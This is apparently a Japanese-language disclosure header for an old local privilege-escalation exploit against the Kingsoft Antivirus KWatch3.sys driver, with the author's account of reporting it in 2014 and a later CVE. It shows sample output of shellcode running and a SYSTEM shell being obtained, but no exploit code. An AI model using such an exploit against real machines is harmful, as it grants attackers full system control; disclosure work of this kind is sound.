
Kingsoft Antivirus KWatch Driver(バージョン2009.3.17.77)におけるローカルのEoP脆弱性の、数年前のエクスプロイトです。
この問題を2014年1月に報告し、8年以上後にCVEの通知を受けました。自分の古いコードを見つけられ、それだけの時間がかかったことが面白いので、これをアップロードすることにしました。
したがって、新しいCVEにもかかわらず、これは新しい脆弱性ではないはずです。簡単な検索で、既に同じように見える脆弱性の報告が複数あることがわかりました。
IPAがその役割を果たし、私の一日を素晴らしいものにしてくれたことに感謝します。
脆弱なファイルは次のハッシュです:ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/